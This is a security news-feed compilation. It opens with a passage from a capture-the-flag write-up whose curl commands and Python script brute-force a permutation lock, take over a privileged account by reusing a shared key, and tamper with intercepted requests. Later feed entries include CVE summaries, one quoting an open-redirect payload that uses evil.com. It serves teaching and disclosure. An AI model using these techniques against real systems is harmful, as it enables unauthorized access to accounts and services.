d@{i} | tee -a out.txt done This resulted in a stream of ones and zeroes and decoding it as ASCII returned the flag. Hiding in the Noise - 1 We’re back to PCAPs here and have the following task: The attached packet capture contains real BACnet traffic as well as BACnet traffic from a command-and-control (C2) server communicating with a remote access trojan (RAT). Can you determine the IP address of the RAT? We looked at the I/O graphs of the connections which where mainly in sync with deterministic spikes, except for one connection that had irregular bumps. Zeroing in on this connection, it turned out that one of the IP addresses involved sends malformed packets – a clear sign that this was the RAT communicating with its C2-server. This IP address was 10.20.21.91 and that was the correct answer. Web The web-part consisted of four challenges which we all solved. Clear Intentions The description reads: A website’s intentions aren’t always clear or at least not as obvious. Can you help us figure out what this site is doing? We’ll gladly pay bitc... I mea n, a challenge flag for your time A bit of background Take a look at the site (https://[redacted].firstchallenges.ninja/clarity), follow the trail and see where it leads you. You can get past the front door with c ode [redacted] When connecting to the webpage, we were confronted with a login page which told us to urgently validate our account by typing in a username and a password. In the network traffic, we also noticed that the main part of the page is dynamically built by a javascript called image.js. This contained a function called xyzl with an interesting URL, i.e. https://[redacted].firstchallenges.ninja/clarity/harvest’ within another function called postData which, to our surprise, posts data to this URL. Well, let’s try the most primitive thing – a POST request: $ curl -X POST https://[redacted].firstchallenges.ninja/clarity/harvest {"flag": "6ced11aa9bc1aeab98241abc3f7a3c84987786c7"} Oh, ehm, that was easier than expected :D Permutation Lock Another website with the following task: It appears that we’ve lost the key to this locked site. Can you help recover the right code? A bit of background The locked site can be found at https://[redacted].firstchallenges.ninja/order. You can get past the front door by entering FIRST2021 On the next page you will find a list of available codes at the top and empty fields below that you need to place in the right order. You’ll need to enter the characters available in the empty fields in the right order before gaining access to the locked site. Once the right code order is entered you will be redirected to another page letting you know of your success and show you the challenge flag. You can test success page by entering test code [redacted] in the emtpy fields. There are over 5,000 possible permutations for this lock. Good luck! As https://ctf.firstseclounge.org/ states Any attempts at cheating, multiple registrations, brute force or other malicious actions against the challenge framework and corresponding infrastructure will result in immediate exclusion from the challenge for the offending team. we specifically asked whether it is allowed to just try all combinations or if this will be considered brute-force. We were told that in this case trying all combinations is acceptable. So we proceeded with our initial idea of just trying out stuff: import requests import itertools reqs = requests.session() access_code = { ('access_code', (None, 'FIRST2021')), } resp = reqs.post('https://[redacted].firstchallenges.ninja/order/default', files=access_code) seq = ['21', '2D', '2E', '41', '56', '58', '5F'] seq_perms = list(itertools.permutations(seq)) seq_max = len(seq_perms) seq_curr = 0 for perm in seq_perms: print("{}/{}".format(seq_curr, seq_max), sep='', end='\r', flush=True) seq_curr += 1 data = { ('first', (None, perm[0])), ('second', (None, perm[1])), ('third', (None, perm[2])), ('fourth', (None, perm[3])), ('fifth', (None, perm[4])), ('sixth', (None, perm[5])), ('seventh', (None, perm[6])), } resp = reqs.post('https://[redacted].firstchallenges.ninja/order/orderme', files=data) if "Not Valid" in resp.text: continue print("Possible answer found?: {}".format(perm)) Running the script returned the flag: 2E21582D415F56. Time to REST The description read: You will need to setup a method to interact with the REST api and understand the methods available to you. The API is avaiable on https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken, and the available endpoints are fetchtoken, whoami, who, flag. Unfortunately, guest accounts do not have access to the flag endpoint, so they won’t receive a response with a valid challenge flag. To ensure you aren’t interrupting another competitor, you can pick one of the seven guest accounts below. [redacted] Discussion With fetchtoken you’ll need to provide the id and key value pairs and it will respond a valid token that can be used to interact with the rest of the API. You can use whoami to verify the identity associated with your token. If you provide ‘token’ with and a valid token string, it will respond with identity of the user associated with the token. The who endpoint accepts a token’ key with valid token string value, it will respond with a data of the accounts with an active token on the system. Finally, calling the ‘flag’ endpoint with a valid ‘token’ and token string value might respond with a challenge flag. Guest accounts do not have access to a valid challenge flag, so they’ll receive a forbidden response value pair. If you access the flag endpoint with a more priviledge token, then you’ll get a real challenge flag. We started be grabbing a new token from https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken which returns an object of the form {"token": "aaaaaaaaaaaaaaaaaaa-bbbbbbbbbbbbbb-ccccccccccccccccccc"}: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "id=guest7" \ --data-urlencode "key=rdmCAbYtDD3rnEcPNngjP3Sp3Lft4GYc6nG3mDnq" {"token": "3230332e302e3131332e3432-677565737435-31363234303036373631"} The token contains hex encoded values, which contain: 3230332e302e3131332e3432 == 203.0.113.42, this contains our IPv4 address. In the output, we changed this value to an IPv4 address in the 203.0.113.0/24 network which is reserved for documentation. 677565737435 == guest5, i.e. our identity 31363234303036373631 == 1624006761 which is a UNIX timestamp, in this case 2021-06-18T10:59:21+02:00 (we rerun the exercise while writing the documentation, so it’s after the challenge ended). Using the token we received, we can ask who we are: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/whoami" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "token=3230332e302e3131332e3432-677565737435-31363234303036373631" {"identity": "guest5"} This works as expected. Let’s see who else is on the system: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/who" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "token=3230332e302e3131332e3432-677565737435-31363234303036373631" {"guest": {"logged": "961 hours ago", "remote": "[redacted]", "identity": "guest"}, "guest7": {"logged": "190 hours ago", "remote": "[redacted]", "identity": "guest7"}, "Admin": {"logged": "231 hours ago", "remote": "[redacted]", "identity": "Admin"}, "guest6": {"logged": "235 hours ago", "remote": "[redacted]", "identity": "guest6"}, "admin": {"logged": "200 hours ago", "remote": "[redacted]", "identity": "admin"}, "guest4": {"logged": "234 hours ago", "remote": "[redacted]", "identity": "guest4"}, "guest5": {"logged": "less than 1 hr", "remote": "[redacted]", "identity": "guest5"}, "guest2": {"logged": "235 hours ago", "remote": "[redacted]", "identity": "guest2"}, "guest3": {"logged": "189 hours ago", "remote": "[redacted]", "identity": "guest3"}, "guest1": {"logged": "191 hours ago", "remote": "[redacted]", "identity": "guest1"}, "first": {"logged": "20 hours ago", "remote": "[redacted]", "identity": "first"}} While we were told that guest accounts have no access to the flag, we still wanted to be sure: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/flag" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "token=3230332e302e3131332e3432-677565737435-31363234303036373631" {"forbidden": "You do not have permission to access the flag."} That was expected. Looking at the who output again, we can see that besides guest accounts, there were also Admin, admin, and first accounts active. As this is the FIRST CTF, we’ll try the first account first. Just changing the account in the token to 6669727374, which is the hex-encoded value of first doesn’t work, but this is expected as we assumed that the tokens are stored somewhere on the server as well. Hence, we tried to fetch a new token for the first account, using the same key all the guest accounts used: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken" \ > --header "Content-Type: application/x-www-form-urlencoded" \ > --data-urlencode "id=first" \ > --data-urlencode "key=rdmCAbYtDD3rnEcPNngjP3Sp3Lft4GYc6nG3mDnq" {"token": "3230332e302e3131332e3432-6669727374-31363234303130383133"} That seemed to work, so let’s try to get the flag: $ curl --location --request POST "https://[redacted].firstchallenges.ninja/accounts/default/flag" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "token=3230332e302e3131332e3432-6669727374-31363234303130383133" {"flag": "92e7f5ed2e6933b47cc494d3eb4d0baf"} Great, that’s it :) Intern Dev Tango A new task, a new URL: Our new dev intern has completed their first assignment, can you help test it? A bit of background The site is very simple, but we are trying to figure out the bugs. Once you find all the bugs we’ll reward you with a shiny challenge flag. You can find the new site at https://[redacted].firstchallenges.ninja/tango and you can use the code FIRST2021 to get past the front door. Good luck! When visiting the site, we’re greeted with a question “Name a fun FIRST special interest group?". The answer is very likely”seclounge-sig", but when we try to put it in, the letters are completely scrambled. The HTML looks like this: Tango Name of a fun FIRST special interest group? Submit Let’s check what question.js is doing, as this is the most likely culprit for the scrambling: function getrando(){ let mc = []; for(let i=65; i<91; ++i){ mc.push(String.fromCharCode(i)) } for(let i=97; i<123; ++i){ mc.push(String.fromCharCode(i)) } let randoIndex = Math.floor(Math.random() * mc.length); return mc[randoIndex] } function bechanged(){ let fin = ""; for(let i=0; i<9; ++i){ fin += getrando(); } fin += "-" for(let i=0; i<3; ++i){ fin += getrando(); } let orig = document.querySelector(".maincontent .inputform .inputfield"); orig.value=fin; } let tchnge = document.querySelector(".maincontent .inputform .inputfield"); tchnge.addEventListener("keyup", bechanged, false); Well, okay, that explains things :D We fired up ZAP and looked at the request: POST https://[redacted].firstchallenges.ninja/tango/question HTTP/1.1 User-Agent: [redacted] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------4660448215033997732555194938 Content-Length: 182 Origin: https://[redacted].firstchallenges.ninja Connection: keep-alive Referer: https://[redacted].firstchallenges.ninja/tango/question Cookie: session_id_tango=[redacted] Upgrade-Insecure-Requests: 1 Host: [redacted].firstchallenges.ninja -----------------------------4660448215033997732555194938 Content-Disposition: form-data; name="code" UzDjBDxSu-twr -----------------------------4660448215033997732555194938-- So, we changed it to POST https://[redacted].firstchallenges.ninja/tango/question HTTP/1.1 User-Agent: [redacted] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------4660448215033997732555194938 Content-Length: 182 Origin: https://[redacted].firstchallenges.ninja Connection: keep-alive Referer: https://[redacted].firstchallenges.ninja/tango/question Cookie: session_id_tango=[redacted] Upgrade-Insecure-Requests: 1 Host: [redacted].firstchallenges.ninja -----------------------------4660448215033997732555194938 Content-Disposition: form-data; name="code" seclounge-sig -----------------------------4660448215033997732555194938-- and resent it. The HTML response said: Tango HERE IS YOUR CHALLENGE FLAG 339636a5b9df27dd15704828f5c10037e8334099 And there we go \o/ Cryptography This section contained three challenges which we all solved. It was a bit disappointing, as it was not really about crypto but just about encodings. Decode Task: Decode: VGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlcyBpczogV0x1Qklkd09qN2tzV05neVZuemhOVkphSmdUdXc0SUUK Well, $ echo "VGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlcyBpczogV0x1Qklkd09qN2tzV05neVZuemhOVkphSmdUdXc0SUUK" | base64 -d The flag for this challenges is: WLuBIdwOj7ksWNgyVnzhNVJaJgTuw4IE Decode 2 Task: <~<+ohcAo(mg+D,P4+EV:2F!+t+@;KakDJ*N’Blc"c8nW-:=&hV$C,g&fAp$l8nt78nULN7osSM$3~> As we had no base85 utilities installed per default on our machines, we just used CyberChef and got: The flag for this challenge is: rT8CJgqKWUChj8m5fu96JhNjJgC8GWnt Decode 3 Task: %96 7=28 7@C E9:D 492==6?86 :Di E?K_#8?F!wxss8AI’$GAv4wx)zp>K!r_ Luckily, we didn’t have to search long for this, as one of us recently had to write encoding and decoding for ROT47 and immediately recognized the pattern, so we again turned to CyberChef to get the flag: The flag for this challenge is: tnz0RgnuPHIDDgpxVSvpGcHIXKAmzPC0 The _ characters seem to be oledump.py’s way of indicating a linebreak.↩ This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/6/first-challenge-2021-writeup
Já se encontra disponível o Global Cybersecurity Index 2020 da UIT
2021-06-30T00:00:00Z | 1625011200

Do relatório da União Internacional das Telecomunicações (UIT) destaca-se a subida de Portugal na classificação em relação ao relatório de 2018: Portugal está agora no 14.º lugar no ranking global (42.º em 2018) e no 8.º lugar no ranking regional (Europa) (25.º em 2018).Para a melhoria de Portugal neste índice contribuiu o conjunto de iniciativas legislativas, técnicas, organizacionais, de desenvolvimento de capacidades e de cooperação que têm vindo a ser definidas e implementadas com o objetivo de reforçar o quadro da cibersegurança ao nível nacional nos últimos anos. Este relatório, que analisa um conjunto de evidências em matéria de segurança do ciberespaço ao nível nacional, classifica como pontos fortes em Portugal as medidas legislativas e regulatórias, a existência e implementação de capacidades ao nível das equipas de resposta a incidentes – nacional e setorial – e a cooperação e sinergias entre agências e setores. Muito perto de uma classificação máxima estão também as medidas implementadas ao nível estratégico e organizacional e as medidas para a sensibilização, formação, treino e educação para a cibersegurança.Recorde-se que o Índice Global de Segurança do Ciberespaço foi lançado pela primeira vez em 2015 pela UIT para medir o compromisso de 193 Estados Membros da ITU no que respeita à segurança do ciberespaço, de forma a ajudá-los a identificar áreas com perspetiva de melhoria, mas também, incentivar os países a agir por via da conscientização sobre o estado da Cibersegurança em todo o mundo. Estamos a falar dos riscos, prioridades e evolução dos recursos de Cibersegurança, aos quais o Global Cybersecurity Index também se adaptou para oferecer um maior número de medidas nesse sentido, a serem consideradas pelos países.Assim, este relatório visa não só compreender melhor os compromissos dos países com a cibersegurança, mas também, identificar lacunas, encorajar a inclusão de boas práticas e fornecer informação útil para que os países melhorem o seu posicionamento nesta matéria.O documento pode ser consultado na íntegra aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135565/ja-se-encontra-disponivel-o-global-cybersecurity-index-2020-da-uit
CVE-2021-23401
2021-06-30T00:00:00Z | 1625011200

CWE-601 URL REDIRECTION TO UNTRUSTED SITE: Affected versions of this package are vulnerable to Open Redirect. When using the make_safe_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple back slashes such as /////evil.com/path or \\\evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False`. Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-23401
Gartner’s Nat Smith Explains What Is and Is Not SASE
2021-06-29T07:28:27Z | 1624951707

A good portion of my day is spent speaking with the news media about Cato and the SASE market. There’s a routine to these conversations. Many will groan over an acronym that’s pronounced “sassy.” They’ll listen but often dismiss the area as “just more Gartner hype.”  For many, SASE seems like another marketing exercise like Big Data or Cloud Computing. And I get that. For 20+ years, I too was an IT journalist. As a feature journalist, I was lucky. I... The post Gartner’s Nat Smith Explains What Is and Is Not SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/gartners-nat-smith-explains-what-is-and-is-not-sase/
Critical vulnerability in Zyxel firewall products
2021-06-29T07:10:42Z | 1624950642

Network device manufacturer Zyxel has notified that an advanced adversary is exploiting a vulnerability in specific firewall devices. The exploits have begun on June 22nd. Zyxel has released a patch and instructions for mitigating the issue.

https://www.kyberturvallisuuskeskus.fi/en/haavoittuvuus_18/2021
The Threat That Never Went Away Is Back (with a Vengeance)
2021-06-29T04:00:00Z | 1624939200

What is your recollection of May 2017? Emmanuel Macron won the French election. The Ringling Bros. and Barnum & Bailey Circus gave its final performance after a 146-year run. The U.S. FCC voted to overturn net neutrality rules. And the National Health Service in the United Kingdom was crippled by a massive ransomware attack that ended up costing over $120 million.

https://www.akamai.com/blog/security/the-threat-that-never-went-away-is-back-with-a-vengeance
CVE-2021-34569
2021-06-29T00:00:00Z | 1624924800

CWE-787 OUT OF BOUNDS WRITE: An attacker can send a specially crafted packet containing OS commands to crash the diagnostic tool and write memory.

https://claroty.com/team82/disclosure-dashboard/cve-2021-34569
CVE-2021-34568
2021-06-29T00:00:00Z | 1624924800

CWE-770 ALLOCATION OF RESOURCES WITHOUT LIMITS OR THROTTLING: An attacker can send a specially crafted packet containing OS commands to provoke a denial of service.

https://claroty.com/team82/disclosure-dashboard/cve-2021-34568
CVE-2021-34567
2021-06-29T00:00:00Z | 1624924800

CWE-125 OUT OF BOUNDS READ: An attacker can send a specially crafted packet containing OS commands to provoke a denial of service and an out-of-bounds read. Read more: "Top-Down and Bottom-Up: Exploiting Vulnerabilities in the OT Cloud Era"

https://claroty.com/team82/disclosure-dashboard/cve-2021-34567
CVE-2021-34566
2021-06-29T00:00:00Z | 1624924800

CWE-120 SHARED MEMORY OVERFLOW: An attacker can send a specially crafted packet containing OS commands to crash the iocheck process and write memory.

https://claroty.com/team82/disclosure-dashboard/cve-2021-34566
CVE-2021-33010
2021-06-29T00:00:00Z | 1624924800

CWE-248 UNCAUGHT EXCEPTION: An exception is thrown from a function, but it is not caught, which may cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-33010
CVE-2021-33008
2021-06-29T00:00:00Z | 1624924800

CWE-306 MISSING AUTHENTICATION FOR CRITICAL FUNCTION The software does not perform any authentication for functionality that requires a provable user identity.

https://claroty.com/team82/disclosure-dashboard/cve-2021-33008
CVE-2021-32985
2021-06-29T00:00:00Z | 1624924800

Successful exploitation of these vulnerabilities, if exploited and chained together, could allow a malicious entity to achieve arbitrary code execution with system privileges or cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32985
CVE-2021-32981
2021-06-29T00:00:00Z | 1624924800

Successful exploitation of these vulnerabilities, if exploited and chained together, could allow a malicious entity to achieve arbitrary code execution with system privileges or cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32981
CVE-2021-32977
2021-06-29T00:00:00Z | 1624924800

Successful exploitation of these vulnerabilities, if exploited and chained together, could allow a malicious entity to achieve arbitrary code execution with system privileges or cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32977
PowerISO DMG File Format Handler memory corruption vulnerability
2021-06-28T00:00:00Z | 1624838400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1308
Domains used by Flubot malware now known
2021-06-25T13:07:00Z | 1624626420

Flubot is mobile-phone malware that spreads via links in SMS messages. Last month, the Dutch police warned of this malicious app and related misleading messages about packages. Currently, the domain names are know that the Flubot malware (version 4.6 and earlier) uses for communication with the command-and-control server. The NCSC has shared the list with domain names used by the malware. Organisations can use this list to detect and/or block infections and to take action where necessary.

https://english.ncsc.nl/latest/news/2021/june/25/domains-used-by-flubot-malware-now-known
How to Perform a Zero Trust AWS Assessment with Infection Monkey and ScoutSuite
2021-06-23T14:34:00Z | 1624458840

Take action on issues highlighted in the report to ensure your AWS cloud defenses are protected in a data breach, minimizing impact and data loss.

https://www.akamai.com/blog/security/monkey-scoutsuite-ztx
Typical rainy cyber weather in May
2021-06-23T13:02:55Z | 1624453375

Information security incidents are never isolated phenomena; instead, events are often connected to each other. This became evident once more in May. In persistent campaigns targeting Android devices, scams and phishing attempts have escalated into malware attacks.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-toukokuu-2021
Typical rainy cyber weather in May
2021-06-23T13:02:55Z | 1624453375

Information security incidents are never isolated phenomena; instead, events are often connected to each other. This became evident once more in May. In persistent campaigns targeting Android devices, scams and phishing attempts have escalated into malware attacks.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-toukokuu-2021
Advice to help you protect your accounts
2021-06-23T08:15:33Z | 1624436133

Attempts to break into and hijack accounts used in online services are often made using different methods. This article contains brief instructions on how to protect yourself in advance and what to do after a breach.

https://www.kyberturvallisuuskeskus.fi/en/news/advice-help-you-protect-your-accounts
Advice to help you protect your accounts
2021-06-23T08:15:33Z | 1624436133

Attempts to break into and hijack accounts used in online services are often made using different methods. This article contains brief instructions on how to protect yourself in advance and what to do after a breach.

https://www.kyberturvallisuuskeskus.fi/en/news/advice-help-you-protect-your-accounts
World-Class OTT Streaming from MwareTV with Akamai
2021-06-23T04:00:00Z | 1624420800

Since the onset of the pandemic, home entertainment has never been more important. Millions of users across the globe have turned to over-the-top (OTT) streaming and live TV to bring much-needed diversion and exciting content into their lives.

https://www.akamai.com/blog/performance/world-class-ott-streaming-from-mwaretv-with-akamai
Targeted Cache Control
2021-06-23T04:00:00Z | 1624420800

Content delivery networks (CDNs) have been around and have evolved over a long time (in internet years). They all speak HTTP and you can safely rely on them to work with just about anything else that speaks HTTP.

https://www.akamai.com/blog/news/targeted-cache-control
Buffer Overflow in HTTP Request Header Leads to Partial Memory Leak
2021-06-22T18:01:05Z | 1624384865

A vulnerability in SonicOS where the HTTP server response leaks partial memory by sending a crafted unauthenticated HTTP request. This can potentially lead to an internal sensitive data disclosure vulnerability. CVE: CVE-2021-20019 Last updated: Sept. 1, 2021, 10:17 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006
Update to Cato MDR Shortens Time-to-Value, Automates 70 Security Checks
2021-06-22T14:03:56Z | 1624370636

Nobody likes to wait for results, and that’s certainly the case when it comes to managed detection and response (MDR) services. MDR services are meant to eliminate threats faster by outsourcing threat hunting to third-party specialists. But to accomplish their goal, MDR services require up to 90 days to baseline typical network operation. Which is... The post Update to Cato MDR Shortens Time-to-Value, Automates 70 Security Checks appeared first on Cato Networks.

https://www.catonetworks.com/blog/update-to-cato-mdr-shortens-time-to-value-automates-70-security-checks/
Mais rünnati IT-teenusepakkujat ning jõuti seeläbi tema kliendini
2021-06-22T11:06:00Z | 1624359960

Riigi infosüsteemi amet registreeris maikuus 154 mõjuga küberintsidenti. Üks lunavaraintsident osutus väga edukaks, sest esmase tabamuse saanud IT-teenust pakkuva ettevõte kaudu pääsesid kurjategijad ligi ühe Läänemaa vallavalitsuse süsteemidele.

https://ria.ee/uudised/mais-runnati-it-teenusepakkujat-ning-jouti-seelabi-tema-kliendini
MKM: Esimene eesti.ee ettevõtja digivärava teenus leidis tegija
2021-06-22T08:14:20Z | 1624349660

Riigi Infosüsteemi Amet (RIA) sõlmis hankelepingu osaühinguga Proud Engineers, mille eesmärk on viia läbi analüüs ettevõtete jaoks riigiportaali eesti.ee volituste haldamise süsteemi lahenduse leidmiseks. Majandus- ja Kommunikatsiooniministeeriumi ja RIA eesmärk on koondada kogu ettevõtjatele vajalik info ja teenused riigiportaali eesti.ee.

https://ria.ee/uudised/mkm-esimene-eestiee-ettevotja-digivarava-teenus-leidis-tegija
NorthSec CTF 2021 Write Up: 'Impurity Assessment Form'
2021-06-22T04:00:00Z | 1624334400

This is a write up of a NorthSec 2021 CTF problem I solved with Allan Wirth (@Allan_Wirth) as part of team SaaS which finished in 3rd. It was an extremely creative problem to solve so I wanted to share it here.

https://www.akamai.com/blog/security/northsec-ctf-2021-write-up-impurity-assessment-form
Crypto Threats Surge by 500%, and It's All About the Money
2021-06-22T04:00:00Z | 1624334400

Previously reserved for early adopters and tech-savvy consumers, cryptocurrencies have gone mainstream -- with tech entrepreneurs and prominent financial institutions leading the charge.

https://www.akamai.com/blog/security/crypto-threats-surge-by-500-and-its-all-about-the-money
Moodle spellchecker plugin command execution vulnerability
2021-06-22T00:00:00Z | 1624320000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1277
High Threat Security Alert (A21-06-13): Vulnerability in Microsoft Edge (Chromium-based)
2021-06-21T04:00:00Z | 1624248000

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
What A Funny App I Got Here!
2021-06-21T04:00:00Z | 1624248000

When you hear the word "malware", the first thing that might come to your mind is a PC or laptop. You think about some weird advertising pop-ups or unrecognized processes running in the background.

https://www.akamai.com/blog/security/what-a-funny-app-i-got-here
HTTP/3 and QUIC: Past, Present, and Future
2021-06-21T04:00:00Z | 1624248000

You may have seen the announcements over the past two weeks -- the IETF QUIC RFCs have been published! That leads to a lot of questions, depending on how closely you've followed this space.

https://www.akamai.com/blog/performance/http3-and-quic-past-present-and-future
New Admin Portal for Akamai Enterprise Application Access
2021-06-21T04:00:00Z | 1624248000

The definition of a user has evolved to comprise much more than an employee, making secure access to the right application, for the right user, at the right time difficult and complex.

https://www.akamai.com/blog/news/new-admin-portal-for-akamai-enterprise-application-access
CVE-2021–20226 a reference counting bug which leads to local privilege escalation in io_uring
2021-06-21T00:00:00Z | 1624233600

Hello, I’m Shiga( @Ga_ryo_ ), a security engineer at Flatt Security Inc. In this article, I would like to give you a technical description of CVE-2021–20226( ZDI-2021–001 ) which is published before. I discovered this vulnerability and reported it to the vendor via the Zero Day Initiative. This article is not intended to inform you of the dangers of vulnerabilities, but to share tips from a technical point of view. An overview of the vulnerabilities and attack methods can be found at the links below. This blog will explain in a little more detail.

https://flatt.tech/research/posts/a-reference-counting-bug-which-leads-to-local-privilege-escalation-in-io-uring/
CVE-2020–15702 Race Condition vulnerability in handling of PID by apport
2021-06-21T00:00:00Z | 1624233600

Note) It’s just an English version of previous post . Hello, I’m Shiga( @Ga_ryo_ ), a security engineer at Flatt Security Inc. In this article, I would like to give you a technical description of CVE-2020–15702 which is published recently. I discovered this vulnerability and reported it to the vendor via the Zero Day Initiative . This article is not intended to inform you of the dangers of vulnerabilities, but to share tips from a technical point of view.

https://flatt.tech/research/posts/race-condition-vulnerability-in-handling-of-pid-by-apport/
Better Real User Monitoring with BoomerangJS and Akamai mPulse
2021-06-20T04:00:00Z | 1624161600

In this blog, we'll walk through a few different snippet insertion methods and available optimizations.

https://www.akamai.com/blog/performance/better-real-user-monitoring-with-boomerangjs-and-akamai-mpulse
High Threat Security Alert (A21-06-12): Multiple vulnerabilities in Google Chrome
2021-06-18T04:00:00Z | 1623988800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Lançado o Curso Cidadão Cibersocial
2021-06-18T00:00:00Z | 1623974400

A utilização das redes sociais aumentou de forma acentuada nos últimos anos, mas essa utilização acarreta alguns riscos. Por isso, o CNCS desenvolveu o curso Cidadão Cibersocial. Este curso descreve as principais redes sociais para destacar as melhores práticas na sua utilização de modo a melhorar a cibersegurança e ajudar a garantir a privacidade dos utilizadores. Trata-se de um curso interativo com cerca de 3 horas de duração, que procura ser apelativo para todas as pessoas que utilizam redes sociais ou querem conhecer melhor esse mundo. Sem deixar de reconhecer as vantagens deste tipo de plataforma, este curso alerta para os cuidados que devem ser aplicados na sua utilização, consciencializando para as melhores escolhas e evitando a exposição desnecessária a algumas ameaças que aproveitam as redes sociais para proliferar. O curso estará disponível a partir de hoje na plataforma NAU. Os interessados podem inscrever-se e garantir a sua participação aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135544/lancado-o-curso-cidadao-cibersocial
Security Alert (A21-06-10): Multiple Vulnerabilities in Cisco Products
2021-06-17T04:00:00Z | 1623902400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-06-11): Vulnerability in Firefox
2021-06-17T04:00:00Z | 1623902400

Mozilla has published the advisory (MFSA 2021-27) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Provides Prolexic DDoS Service Impact Update (Status: Resolved)
2021-06-17T04:00:00Z | 1623902400

Akamai experienced an outage for one of its Prolexic DDoS services (Routed 3.0) starting at 4:20 AM UTC. We detected the issue immediately, and impacted customers received an error alert within seconds. The impact was limited to Akamai customers using version 3.0 of the Routed service.

https://www.akamai.com/blog/news/akamai-provides-prolexic-ddos-service-impact-update
Stopping Ransomware and Lateral Movement with Segmentation
2021-06-16T19:50:00Z | 1623873000

Learn how to take on the growing ransomware threat, and the necessity of network segmentation from VP of Cyber Research, Amit Serper.

https://www.akamai.com/blog/security/stopping-ransomware-with-segmentation
5G: A Step Beyond the Last Mile?
2021-06-16T17:29:53Z | 1623864593

During the third and fourth quarters of 2019, Amazon spent a total of $3B on its one-day delivery program. At issue for the retail giant was solving the last mile, a challenge that has vexed organizations for decades. The telecom industry, which coined the last mile phrase decades ago, claims to be on the verge... The post 5G: A Step Beyond the Last Mile? appeared first on Cato Networks.

https://www.catonetworks.com/blog/5g-a-step-beyond-the-last-mile/
IT Roundtable: Network and Security Challenges in Evolving Business Environment
2021-06-16T15:06:19Z | 1623855979

The post IT Roundtable: Network and Security Challenges in Evolving Business Environment appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-72
Security Alert (A21-06-06): Vulnerability in Linux Operating Systems
2021-06-16T04:00:00Z | 1623816000

A vulnerability was found in a Linux system service called polkit which is installed by default in several Linux distributions.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-06-07): Multiple Vulnerabilities in Apache HTTP Server
2021-06-16T04:00:00Z | 1623816000

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-06-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-06-16T04:00:00Z | 1623816000

Apple has released iOS 12.5.4 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-06-09): Multiple vulnerabilities in Microsoft Edge (Chromium-based)
2021-06-16T04:00:00Z | 1623816000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Platform Update: New Security Enhancements That Intelligently Automate Application and API Security, Mitigate Online Fraud, and Reduce Burden on Security Professionals
2021-06-16T04:00:00Z | 1623816000

Today is Day 2 of Akamai's Platform Update. Yesterday, we talked about the acceleration of modern app development and how we're empowering users to shift more compute and data to the edge.

https://www.akamai.com/blog/news/akamai-platform-update-new-security-enhancements-that-intelligently
EIP Stack Group OpENer Ethernet/IP UDP handler information disclosure vulnerability
2021-06-16T00:00:00Z | 1623801600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1234
Platform Update: Akamai Boosts Edge Application Power, Expanding Possibilities for Developers
2021-06-15T04:00:00Z | 1623729600

Welcome to the Akamai Platform Update -- two days of new capabilities and innovations across our edge technology and security product portfolios.

https://www.akamai.com/blog/news/platform-update-akamai-boosts-edge-application-power-expanding
The Adaptive Security Engine ? A Quantum Leap Forward for Application and API Protection
2021-06-14T04:00:00Z | 1623643200

